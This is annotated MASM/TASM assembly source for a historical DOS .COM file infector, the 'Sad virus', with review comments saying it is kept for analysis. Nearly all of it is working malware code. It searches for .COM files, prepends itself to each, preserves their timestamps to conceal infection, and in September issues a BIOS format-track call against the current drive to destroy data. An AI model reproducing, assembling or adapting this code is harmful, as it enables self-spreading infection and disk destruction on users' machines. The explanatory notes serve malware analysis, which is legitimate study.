;
; NOTE(review): historical DOS .COM infector ("Sad virus", dated 24/8/91 in its
; own message string), kept here for analysis only.  It is destructive: the
; September payload issues a BIOS format-track call (int 13h / AH=05h) and then
; falls through into the infection code.  Never assemble or run it outside an
; isolated VM with throwaway disks.
;
; NOTE(review): the syntax is MASM/TASM-style (.model tiny, .code, org 100h,
; end start, "lea dx,mess", "ds:[...]" operands, "mov kk,ax"); the mirror's
; "NASM" label is wrong -- NASM would reject these directives and operand forms.
;
; Memory layout assumed throughout (one 64K segment; DOS loads a .COM with
; CS=DS=ES=SS and SP normally just below 0ffffh):
;   0080h..00ffh  PSP command tail / default DTA; saved to 0ff7fh..0fffeh at
;                 do_not_activate: and put back at done:
;   0100h..begp   virus body (length = begp-100h)
;   begp..        the host: the 5-byte exit stub at begp: in the dropper, the
;                 original program in an infected file
;   begp+fso..    write buffer: a copy of the virus, immediately followed by
;   +virus len    read buffer: the victim file (see "ADD CX,AX" below)
;   0fff9h..      6-byte trampoline built at done: (rep movsb / jmp far 0100h)
;
; ---- Data Segment Values (scratch words kept in the PSP, 0f6h..0ffh) ----
;
; ds:[0f6h] = read buffer location
; ds:[0f8h] = write buffer location
; ds:[0fah] = store length of virus at this location
; ds:[0fch] = store length of file to be infected at this location
;             (low 16 bits of the DTA file size only -- see file_found)
; ds:[0feh] = filename of file to infect (a pointer into the DTA, not a copy)
;

.model tiny
.code
org 100h                        ; origin for .com files

start:
    nop                         ; these two nops (bytes 90h 90h) are the
    nop                         ;  infection marker checked by "sub ax,9090h"
                                ;  below; any host that happens to begin with
                                ;  90 90 is treated as already infected

;******
;get date
;******
    mov ah,2ah                  ; DOS get date: DH = month
    int 21h
    cmp dh,09h                  ; is it September?  (any day, any year)
    jnz do_not_activate         ; if NO skip the payload and just infect

;****
;the nasty bit
;****
;*
;* 1. Print message
;*
    lea dx,mess                 ; print the 'Sad virus - 24/8/91' message
    mov ah,09                   ;  (DOS write '$'-terminated string)
    int 21h

;****
;* 2. Destroy disk
;****
    mov ah,19h                  ; DOS get current drive: AL = 0 for A:, 1 for B:,
    int 21h                     ;  2 for C: ...
    mov dl,al                   ; dl = drive number for the BIOS call below
                                ; NOTE(review): int 13h numbers drives
                                ;  differently (80h = first hard disk), but the
                                ;  int 21h value is passed through unchanged:
                                ;  run from C: this addresses BIOS floppy unit 2;
                                ;  what a given BIOS does with that varies
    mov ah,05                   ; BIOS format track
    mov cl,01                   ; (CL is not used by AH=05h)
    mov ch,00                   ; track 0
    mov dh,00                   ; head 0
    mov al,10h                  ; AL = number of sectors on the track (16)
    int 13h                     ; format track 0 / head 0 of drive DL
                                ; NOTE(review): this is a single track, not "the
                                ;  first 16 tracks"; the sector address-field
                                ;  table the BIOS reads from ES:BX for this call
                                ;  is never set up, so ES:BX is whatever they
                                ;  held on entry.  No jump follows: after the
                                ;  payload the virus falls through and infects.

do_not_activate:
    mov cx,80h                  ; save the PSP command tail / default DTA
    mov si,0080h                ;  (80h bytes at 0080h) ...
    mov di,0ff7fh               ;  ... to 0ff7fh..0fffeh at the top of the segment
    rep movsb                   ;  (find first/next below overwrite the DTA;
                                ;   done: copies it back)
                                ; NOTE(review): 0ff7fh..0fffeh is also where the
                                ;  .COM's initial stack sits, so the push/int
                                ;  frames below land inside the saved copy.  They
                                ;  only reach its last few bytes (which map back
                                ;  to the scratch words at 0f8h..0ffh, dead by
                                ;  then), so the real command tail survives, but
                                ;  this is fragile -- verify in a VM.

    lea ax,begp                 ; ax = offset of the end of the virus body
    mov cx,ax                   ; cx = same
    sub ax,100h                 ; ax = begp-100h = length of the virus
    mov ds:[0fah],ax            ; [0fah] = virus length
    add cx,fso                  ; cx = begp + fso = first byte past the host
                                ;  (fso is 5 in the dropper; in an infected file
                                ;  it holds the host length -- see "mov [bx-2],ax")
    mov ds:[0f8h],cx            ; [0f8h] = start of the write buffer
    ADD CX,AX                   ; cx = write buffer + virus length: the read
                                ;  buffer starts right after the virus copy, so
                                ;  one write of (virus+host) bytes from [0f8h]
                                ;  emits the virus followed by the victim
    mov ds:[0f6h],cx            ; [0f6h] = start of the read buffer
    mov cx,ax                   ; cx = virus length
    lea si,start                ; si = 0100h, start of the virus
    mov di,ds:[0f8h]            ; di = write buffer

rb:                             ; (this label is not referenced anywhere)
    rep movsb                   ; copy the virus body into the write buffer

    stc                         ; set CF (has no effect on the call below)

    lea dx,file_type_to_infect  ; ds:dx -> '*?.com' search spec
    mov ah,4eh                  ; DOS find first matching file -> fills the DTA
    mov cx,20h                  ; attribute mask: include files with archive bit
    int 21h                     ; CF clear = found, CF set = error (AX = code)
    or ax,ax                    ; NOTE(review): success is signalled by CF; AX is
                                ;  only documented on failure.  Testing AX=0
                                ;  works on MS-DOS in practice, but jc is the
                                ;  documented check.
    jz file_found
    jmp done                    ; nothing to infect: restore and exit

file_found:
    mov ah,2fh                  ; DOS get DTA address -> es:bx
    int 21h
    mov ax,es:[bx+1ah]          ; low word of the 32-bit file size in the DTA
                                ; NOTE(review): the high word is ignored, so a
                                ;  matching file of 64K or more is read and
                                ;  written with a truncated length
    mov ds:[0fch],ax            ; [0fch] = victim size (low word)
    add bx,1eh                  ; bx -> ASCIZ filename in the DTA
    mov ds:[0feh],bx            ; [0feh] = pointer to that name (it lives in the
                                ;  DTA, so it is valid until the next find next)
    clc
    mov ax,3d02h                ; DOS open, read/write, ds:dx -> name
    mov dx,bx
    int 21h                     ; AX = handle on success, error code on failure
                                ; NOTE(review): CF is not checked -- a failed
                                ;  open (e.g. read-only file) leaves an error
                                ;  code in AX that is then used as the handle
    mov bx,ax                   ; bx = handle of the victim
    mov ax,5700h                ; DOS get file date/time: cx = time, dx = date
    int 21h
    push cx                     ; keep the victim's timestamp for the 5701h
    push dx                     ;  restore below
    mov ah,3fh                  ; DOS read from handle
    mov cx,ds:[0fch]            ; cx = victim size (bytes to read)
    mov dx,ds:[0f6h]            ; ds:dx = read buffer
    int 21h                     ; NOTE(review): nothing checks that read buffer
                                ;  + cx stays below the saved DTA copy at 0ff7fh
                                ;  and the stack; a large victim overruns them
    mov bx,dx                   ; bx = read buffer
    mov ax,[bx]                 ; ax = first two bytes of the victim
    ; infected files start with the marker nop nop (9090h); skip those
    sub ax,9090h                ; ZF set <=> already infected
    jz fin                      ; NOTE(review): this path skips the two pops and
                                ;  the close below, so every already-infected
                                ;  file leaks one DOS handle and 4 bytes of
                                ;  stack; after enough of them the open above
                                ;  fails on the per-process handle limit

    mov ax,ds:[0fch]            ; ax = victim size
    mov bx,ds:[0f6h]            ; bx = read buffer
    mov [bx-2],ax               ; patch the last word of the virus copy, i.e. its
                                ;  "fso" word: in the written file fso holds the
                                ;  host length, which a later run uses both to
                                ;  find its write buffer (begp+fso) and as the
                                ;  byte count when restoring the host at done:
    mov ah,3ch                  ; DOS create/truncate file with handle
    mov cx,00h                  ; attributes: none
    mov dx,ds:[0feh]            ; ds:dx -> victim name
    clc
    int 21h                     ; truncates the existing file to zero length; OK
                                ;  because its contents are already in memory
                                ; NOTE(review): again no CF check, and the handle
                                ;  from the 3d02h open is never closed -- bx is
                                ;  simply overwritten with the new one
    mov bx,ax                   ; bx = handle of the (now empty) victim
    mov ah,40h                  ; DOS write to handle
    mov cx,ds:[0fch]            ; cx = victim size ...
    add cx,ds:[0fah]            ;  ... + virus length
    mov DX,ds:[0f8h]            ; ds:dx = write buffer: virus copy followed by
                                ;  the victim's original bytes
    int 21h                     ; new file = virus + original file
                                ; NOTE(review): CF and AX (bytes actually
                                ;  written) are not checked; a full disk leaves
                                ;  a truncated, unrunnable file behind
    mov ax,5701h                ; DOS set file date/time
    pop dx                      ; dx = original date
    pop cx                      ; cx = original time
    int 21h                     ; so the infected file keeps its old timestamp
    mov ah,3eh                  ; DOS close handle (bx)
    int 21h                     ; (without the 5701h above the close would stamp
                                ;  the file with the current date/time)

fin:
    stc
    mov ah,4fh                  ; DOS find next (same DTA / search spec)
    int 21h
    or ax,ax                    ; NOTE(review): same AX-instead-of-CF test as
                                ;  after find first
    jnz done                    ; no more .com files
    JMP file_found              ; infect the next one

done:
    mov cx,80h                  ; put the saved command tail / DTA back
    mov si,0ff7fh               ;  (reverse of the copy at do_not_activate:)
    mov di,0080h
    rep movsb

    ; Build a 6-byte trampoline at 0fff9h, outside the virus body, that copies
    ; the host back over the virus and runs it:
    ;   0fff9h: F3 A4          rep movsb          ; cx bytes from ds:si to es:di
    ;   0fffbh: EA 00 01 <cs>  jmp far cs:0100h   ; run the host from 100h
    mov ax,0a4f3h               ; F3 A4 = rep movsb (stored little-endian)
    mov ds:[0fff9h],ax
    mov al,0eah                 ; EA = jmp far
    mov ds:[0fffbh],al
    mov ax,100h                 ; target offset 0100h
    mov ds:[0fffch],ax
    lea si,begp                 ; si = where the host's bytes sit (after the virus)
    lea di,start                ; di = 0100h
    mov ax,cs
    mov ds:[0fffeh],ax          ; target segment = cs (this .COM's segment)
    mov kk,ax                   ; patch the segment of the far jmp just below
    mov cx,fso                  ; cx = host length (5 for the stub in the dropper)
                                ; NOTE(review): self-modifying code written into
                                ;  0fff9h..0ffffh, the bytes the initial stack
                                ;  sits on; nothing is pushed between here and
                                ;  the host, so it works, but it is fragile

    db 0eah                     ; jmp far kk:0fff9h (opcode EA, offset, segment)
    dw 0fff9h
kk  dw 0000h                    ; segment word, filled in by "mov kk,ax" above

mess db 'Sad virus - 24/8/91',13,10,'$'   ; payload message ('$'-terminated)

file_type_to_infect db '*?.com',0         ; search spec: .com files in the
                                          ;  current directory only

fso dw 0005h                    ; length of the host that follows begp: 5 in the
                                ; dropper (the stub below); patched to the
                                ; victim's size in every copy written out (see
                                ; "mov [bx-2],ax").  Must remain the last word
                                ; before begp: the patch addresses it as
                                ; "read buffer - 2".
; ----- alma mater

begp:                           ; first-generation "host": a 5-byte stub that
    mov ax,4c00h                ;  just exits (B8 00 4C = 3 bytes, CD 21 = 2),
    int 21h                     ;  matching fso = 5 above

end start